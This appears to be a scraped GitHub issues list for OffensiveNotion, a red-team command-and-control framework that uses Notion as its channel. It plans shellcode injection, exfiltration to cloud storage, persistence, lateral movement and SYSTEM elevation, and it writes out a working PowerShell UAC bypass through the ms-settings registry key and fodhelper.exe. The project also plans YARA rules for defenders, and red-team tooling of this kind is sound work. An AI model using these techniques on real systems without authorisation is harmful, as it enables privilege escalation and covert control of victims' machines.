mttaggart / offensivenotion
Notion as a platform for offensive operations
License: MIT License
Describe the bug
inject self will kill the Notion agent if the injection happens but no session spawns, for example if you inject meterpreter shellcode but no multi/handler is up to catch it.
To Reproduce
Host shellcode
Do not run a multi/handler
Perform self injection
Expected behavior
The agent should handle this and exit from the CreateThread injection routine alive.
The basic idea would be to provide auth tokens dynamically to a command that knew how to send data to S3/Azure/DO storage buckets.
Command proposal
upload s3 $token path/to/file
If at any point you interrupt the install script, the Dockerfile (which has been SED'd to build the agent in the correct os/build version) gets stuck as the one you set during that build. Easily fixable but annoying.
Currently looking for help on this one; need a good example of a Rust implementation of loading the CLR, and of FFI for .NET in general.
There are slight differences between main.py's config setup and the one that occurs if you run the agent with -d. These should be 1-1.
Might be a bug when the Linux (and maybe macOS) agent attempts to selfdestruct but does not have write access to the directory to be able to manipulate the file. Weird edge case and I can't seem to reproduce it, but it did happen that one time.
Describe the bug
LAUNCH_APP is one of the config options that should make the application launch the fake Notion page on Windows/Linux. However, the option is never asked for nor sed'ed in the Python build script.
To Reproduce
Steps to reproduce the behavior:
The LAUNCH_APP option is never requested.
config.json from the first run to include "LAUNCH_APP": true as a key/value pair, similar to sleep and jitter.
#Registry Command Edit
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value [injection] -Force
#Bypass Execution
Start-Process "C:\Windows\System32\fodhelper.exe"
^^
Using VirtualAlloc/VirtualProtect/CreateThread/WaitForSingleObject pattern
Release binaries, cargo build, xfer to Taggart's profile, check links in wiki, social media posts and launch party
Delete bin on disk
Shutdown agent
(bonus) Overwrite proc memory
Though it may be a while before SCShell is online, we did accidentally discover the API call patterns required to do token creation and impersonation a la Cobalt Strike.
Ref:
https://github.com/HuskyHacks/RustySCShell/blob/master/src/main.rs#L80
config and guardrails
Packaged YARA Rules
Allow elevation on Windows from High integrity sessions to NT Authority\SYSTEM.
Looking at [this] from SharpDPAPI as inspiration: https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/lib/Helpers.cs#L400
selfdestruct
inject self
docker build and docker run (that kicks off main.py within the container)
This ship's getting ready to leave the harbor.
Criteria:
Yara rule + interceptor script to POC a defender takedown of the ON agent.
Working branch is https://github.com/mttaggart/OffensiveNotion/tree/defenderkit and can be developed independently of the rest of the project.
is it?
Runas to run in another user's context
Carve out the Notion layer of OffensiveNotion into its own module, allowing the C2 to work on other LOTS channels.
Integrate a way to load COFF files on the agent to provide a lot more flexibility and functionality to the framework.
Seen someone try to write BOFs for CS in Rust: https://github.com/wumb0/rust_bof
Other potentially helpful projects:
https://github.com/trustedsec/COFFLoader
https://github.com/Yaxser/COFFLoader2
https://github.com/frkngksl/NiCOFF
https://github.com/d4rckh/nim-coff
red team responsibly, kiddos
Develop lat move capabilities for all OS builds.
Win:
Lin/macOS:
Shellcode injection for this is probably off the table (shellcode for the ON agent would be unwieldy and frankly ridiculous).
Likely will use some kind of remote copy primitive to send it to other hosts.
(bonus) Any design space for P2P?
command.rs is getting a lil shaggy. Time to break it up into submodules to make adding commands a cleaner experience.
just like the title says
Come up with a way (ways?!) to persist the agent.
For moving data out of the target environment
Crude proto function implemented in b89c5c3
** LONG TERM PROJECT **
Our good friend, president of the Enthusiastic Mollusk Aficionado club himself, @Alh4zr3d, recommended we look into how to mitigate the possibility of SSL proxy/stripping in an environment. This risk is mentioned in passing in the OPSEC section of the Wiki, but not addressed directly.
Some thoughts:
Lots of design space for interesting solutions, and definitely is a lot of work, but I also think it's doable.
Whoami, getprivs, isAdmin
Section for recognizing contributors!
License for the repo, I lean towards MIT
A how-to guide for adding things like new commands to the project
For camouflage (and persistence), actually launch the notion site in a browser that's available.
This is a big lift, but once done, the Windows components will be much more ergonomic.
elevate.rs
getprivs.rs
inject.rs
selfdestruct.rs